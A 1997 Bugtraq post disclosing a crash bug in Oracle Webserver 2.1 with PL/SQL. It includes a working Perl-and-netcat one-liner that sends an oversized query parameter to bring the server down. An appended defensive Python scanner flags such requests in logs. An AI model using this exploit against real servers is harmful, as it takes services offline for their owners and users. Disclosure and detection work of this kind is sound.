[4987] in bugtraq
DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
daemon@ATHENA.MIT.EDU (Simon Josefsson)
Tue Jul 22 19:07:08 1997
Date: Wed, 23 Jul 1997 00:15:31 +0200
Reply-To: Simon Josefsson <jas@PDC.KTH.SE>
From: Simon Josefsson <jas@PDC.KTH.SE>
To: BUGTRAQ@NETSPACE.ORG
Fellow bugtraqers, I stumbled over this tonight. It's a DoS-attack
against an Oracle Webserver 2.1 that serves PL/SQL stored procedures.
The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).
I'm sorry if this is old news (but I'd appreciate it if someone told me
if there is a bugfix somewhere).
(PL/SQL is, simply put, a scripting language within the Oracle database)
---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
# prg <host> <port> <path>
#
# example:
# # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
---
S.
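
Added example, not part of the original post: a log check for the request shape the script above sends, an oversized query parameter under the PL/SQL path. Since the post reports nothing in the server's own logs, it assumes Common Log Format lines from a proxy or capture in front of the server; the `/ows-bin/` prefix comes from the post's usage example, and the 1024-character limit is an assumed threshold (the post only shows that 2600 characters brings v2.1 down).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumptions (not from the post): log format and length limit.
PLSQL_PREFIX = "/ows-bin/"  # path taken from the post's usage example
MAX_LEN = 1024              # assumed limit; the post's request uses 2600

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"')

def oversized_params(request_line, prefix=PLSQL_PREFIX, limit=MAX_LEN):
    """Return [(name, length)] for query fields longer than `limit` under `prefix`."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []  # malformed request line
    try:
        url = urlsplit(parts[1])
    except ValueError:
        return []  # unparsable target
    if not url.path.startswith(prefix):
        return []
    hits = []
    for k, v in parse_qsl(url.query, keep_blank_values=True):
        n = max(len(k), len(v))  # a bare token without '=' parses as a name
        if n > limit:
            hits.append((k[:32], n))
    return hits

def scan(lines, **kw):
    """Return (client, timestamp, name, length) for each oversized field."""
    out = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line
        client, when, request = m.groups()
        out.extend((client, when, k, n) for k, n in oversized_params(request, **kw))
    return out

# Constructed sample lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [22/Jul/1997:23:01:00 +0200] "GET /ows-bin/hr/list?dept=10 HTTP/1.0" 200 512',
    '192.0.2.77 - - [22/Jul/1997:23:02:00 +0200] "GET /ows-bin/fnord?foo=' + "a" * 2600 + ' HTTP/1.0" 502 0',
    '192.0.2.77 - - [22/Jul/1997:23:02:05 +0200] "GET /index.html?x=' + "b" * 3000 + ' HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same length test can be enforced as a request-line limit on the front-end proxy, so that over-long requests never reach the PL/SQL handler.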